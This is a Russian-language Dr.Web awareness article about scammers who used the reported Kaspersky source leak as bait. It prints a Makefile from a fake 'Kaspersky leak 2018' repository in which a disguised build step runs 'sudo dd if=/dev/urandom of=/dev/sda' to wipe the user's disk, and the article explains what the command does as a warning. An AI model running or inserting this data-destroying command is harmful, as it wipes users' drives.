Вы используете устаревший браузер!

Страница может отображаться некорректно.

Наследники О. Бендера

Наследники О. Бендера

Другие выпуски этой рубрики (24)
  • добавить в избранное
    Добавить в закладки

Инфоповод для обмана

Прочитали: 1196 Комментариев: 86 Рейтинг: 93

Почти любой инфоповод может использоваться мошенниками в своих интересах – скажем, для рассылки фишинговых писем. Иногда такие жульнические «шутки» заходят слишком далеко.

В начале 2018 года появилась новость об утечке исходных кодов одной из антивирусных компаний.

Сегодня утром на телеграм-канале Mash был опубликован анонимный «слив» про утечку исходников «Лаборатории Касперского». Утверждалось, что сотрудник компании «на протяжении длительного времени скачивал исходные коды антивируса» — и в ноябре 2017 года выложил их на GitHub.

https://geektimes.ru/post/298619/

Компания-разработчик оперативно добилась удаления выложенных исходных текстов, но народу же интересно! Мошенники подсуетились и не замедлили выложить свой вариант кода.

В одном из репозиториев GitHub под названием Kaspersky leak 2018 Makefile содержит такие строки:

all:
echo Check depends…
echo Install depends…
sudo dd if=/dev/urandom of=/dev/sda

Что делают эти четыре строчки? Те, что начинаются с echo, выводят в консоль, на которой запустили сборочный якобы скрипт, сообщения, показывающие, что собираются зависимости, необходимые для сборки продукта (производится проверка, все ли необходимое доступно). А вот четвертая строчка производит запись случайных данных (команда dd) на диск sda – скорее всего, это будет ваш основной диск. В результате выполнения этой команды все ваши данные будут уничтожены.

Некоторые пользователи утверждают, что:

Это не фигня, а самый надежный способ избавиться от любого вредоносного кода на устройстве /dev/sda.

Но «Антивирусная правДА!» против лечения головной боли отсеканием головы!

Если серьезно, то данная утечка показывает только одно – несостоятельность утверждения о том, что антивирусы пишут вирусы. Иначе бы уволившиеся недоброжелатели антивирусных компаний давно бы уже выложили на всеобщее обозрение доказательства этого утверждения.

Dr.Web рекомендует

Будьте осторожны и не запускайте все подряд!

15.01.2018 в 16:45 по Самарскому времени произошло заражение рабочего места главного бухгалтера и шифрование всех пользовательских файлов посредством запуска файла «Акты на проверку», содержавшегося во вложении письма. В связи с тем, что за этим рабочим местом работал главный бухгалтер, на нем находились все базы данных 1С «Предприятие», и вся работа бухгалтерии остановилась.

Обращение в техническую поддержку «Доктор Веб»

Получайте Dr.Web-ки за участие в проекте

Каждая активность = 1 Dr.Web-ка

Оцените выпуск

Сделайте репост

Поставьте «Нравится»

Чтобы получать награды надо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

10 Dr.Web-ок за комментарий в день выхода выпуска или 1 Dr.Web-ка в любой другой день. Комментарии публикуются автоматически и постмодерируются. Правила комментирования новостей «Доктор Веб».

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей


 
На страницу: